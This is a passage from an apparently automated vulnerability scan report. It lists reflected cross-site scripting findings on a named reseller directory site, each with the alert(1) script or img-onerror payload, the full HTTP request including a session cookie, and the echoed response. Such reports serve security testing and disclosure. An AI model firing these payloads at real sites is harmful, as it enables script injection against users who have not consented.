<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4c248<script>alert(1)</script>376bceaa549f58cde/resell?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4346. http://www.resellerbase.com/tag/resell [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resell

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ff09<script>alert(1)</script>3b7a0f1f516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3ff09<script>alert(1)</script>3b7a0f1f516/resell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3ff09<script>alert(1)</script>3b7a0f1f516/resell was not found on this server.</p>
...[SNIP]...

2.4347. http://www.resellerbase.com/tag/resell [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3169b<img%20src%3da%20onerror%3dalert(1)>e2939cd366 was submitted in the REST URL parameter 2. This input was echoed as 3169b<img src=a onerror=alert(1)>e2939cd366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resell3169b<img%20src%3da%20onerror%3dalert(1)>e2939cd366 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resell3169b<img src=a onerror=alert(1)>e2939cd366]</td>
...[SNIP]...

2.4348. http://www.resellerbase.com/tag/resell [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3d4e8</title><img%20src%3da%20onerror%3dalert(1)>95efad5ded5 was submitted in the REST URL parameter 2. This input was echoed as 3d4e8</title><img src=a onerror=alert(1)>95efad5ded5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resell3d4e8</title><img%20src%3da%20onerror%3dalert(1)>95efad5ded5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resell3d4e8</title><img src=a onerror=alert(1)>95efad5ded5</title>
...[SNIP]...

2.4349. http://www.resellerbase.com/tag/resell [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3c3b1</title><img%20src%3da%20onerror%3dalert(1)>9aa0a5c5c920ba23 was submitted in the REST URL parameter 2. This input was echoed as 3c3b1</title><img src=a onerror=alert(1)>9aa0a5c5c920ba23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/resell3c3b1</title><img%20src%3da%20onerror%3dalert(1)>9aa0a5c5c920ba23?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resell3c3b1</title><img src=a onerror=alert(1)>9aa0a5c5c920ba23</title>
...[SNIP]...

2.4350. http://www.resellerbase.com/tag/resell [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f7f2<img%20src%3da%20onerror%3dalert(1)>39fc79e449cf59919 was submitted in the REST URL parameter 2. This input was echoed as 8f7f2<img src=a onerror=alert(1)>39fc79e449cf59919 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/resell8f7f2<img%20src%3da%20onerror%3dalert(1)>39fc79e449cf59919?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resell8f7f2<img src=a onerror=alert(1)>39fc79e449cf59919]</td>
...[SNIP]...

2.4351. http://www.resellerbase.com/tag/reseller [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ccaf<script>alert(1)</script>fb1fe5515e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2ccaf<script>alert(1)</script>fb1fe5515e8/reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2ccaf<script>alert(1)</script>fb1fe5515e8/reseller was not found on this server.</p>
...[SNIP]...

2.4352. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+programs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3f39<script>alert(1)</script>64e3d926968 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagf3f39<script>alert(1)</script>64e3d926968/reseller+programs HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagf3f39<script>alert(1)</script>64e3d926968/reseller+programs was not found on this server.</p>
...[SNIP]...

2.4353. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+programs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae374<script>alert(1)</script>a140fd43494269670 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagae374<script>alert(1)</script>a140fd43494269670/reseller+programs?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagae374<script>alert(1)</script>a140fd43494269670/reseller+programs?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4354. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a9591</title><img%20src%3da%20onerror%3dalert(1)>467dbece1c8 was submitted in the REST URL parameter 2. This input was echoed as a9591</title><img src=a onerror=alert(1)>467dbece1c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+programsa9591</title><img%20src%3da%20onerror%3dalert(1)>467dbece1c8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller programsa9591</title><img src=a onerror=alert(1)>467dbece1c8</title>
...[SNIP]...

2.4355. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c9da<img%20src%3da%20onerror%3dalert(1)>0e9c277bedb was submitted in the REST URL parameter 2. This input was echoed as 1c9da<img src=a onerror=alert(1)>0e9c277bedb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+programs1c9da<img%20src%3da%20onerror%3dalert(1)>0e9c277bedb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller programs1c9da<img src=a onerror=alert(1)>0e9c277bedb]</td>
...[SNIP]...

2.4356. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f050<img%20src%3da%20onerror%3dalert(1)>f20cbc1c1f49b3159 was submitted in the REST URL parameter 2. This input was echoed as 8f050<img src=a onerror=alert(1)>f20cbc1c1f49b3159 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/reseller+programs8f050<img%20src%3da%20onerror%3dalert(1)>f20cbc1c1f49b3159?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller programs8f050<img src=a onerror=alert(1)>f20cbc1c1f49b3159]</td>
...[SNIP]...

2.4357. http://www.resellerbase.com/tag/reseller+programs [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+programs

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 90c5f</title><img%20src%3da%20onerror%3dalert(1)>499336b491a8fbbe2 was submitted in the REST URL parameter 2. This input was echoed as 90c5f</title><img src=a onerror=alert(1)>499336b491a8fbbe2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/reseller+programs90c5f</title><img%20src%3da%20onerror%3dalert(1)>499336b491a8fbbe2?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller programs90c5f</title><img src=a onerror=alert(1)>499336b491a8fbbe2</title>
...[SNIP]...

2.4358. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2da38<script>alert(1)</script>287e45fb6c0701192 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag2da38<script>alert(1)</script>287e45fb6c0701192/reseller+rights?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2da38<script>alert(1)</script>287e45fb6c0701192/reseller+rights?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4359. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+rights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b399<script>alert(1)</script>bab8fb68af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag8b399<script>alert(1)</script>bab8fb68af4/reseller+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8b399<script>alert(1)</script>bab8fb68af4/reseller+rights was not found on this server.</p>
...[SNIP]...

2.4360. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7d4f3</title><img%20src%3da%20onerror%3dalert(1)>9bc5450c7c8 was submitted in the REST URL parameter 2. This input was echoed as 7d4f3</title><img src=a onerror=alert(1)>9bc5450c7c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+rights7d4f3</title><img%20src%3da%20onerror%3dalert(1)>9bc5450c7c8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reseller rights7d4f3</title><img src=a onerror=alert(1)>9bc5450c7c8</title>
...[SNIP]...

2.4361. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ce07<img%20src%3da%20onerror%3dalert(1)>b4b3111f6c23ee02c was submitted in the REST URL parameter 2. This input was echoed as 5ce07<img src=a onerror=alert(1)>b4b3111f6c23ee02c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/reseller+rights5ce07<img%20src%3da%20onerror%3dalert(1)>b4b3111f6c23ee02c?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseller rights5ce07<img src=a onerror=alert(1)>b4b3111f6c23ee02c]</td>
...[SNIP]...

2.4362. http://www.resellerbase.com/tag/reseller+rights [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+rights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dce56<img%20src%3da%20onerror%3dalert(1)>bdfdc249d23 was submitted in the REST URL parameter 2. This input was echoed as dce56<img src=a onerror=alert(1)>bdfdc249d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseller+rightsdce56<img%20src%3da%20onerror%3dalert(1)>bdfdc249d23 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
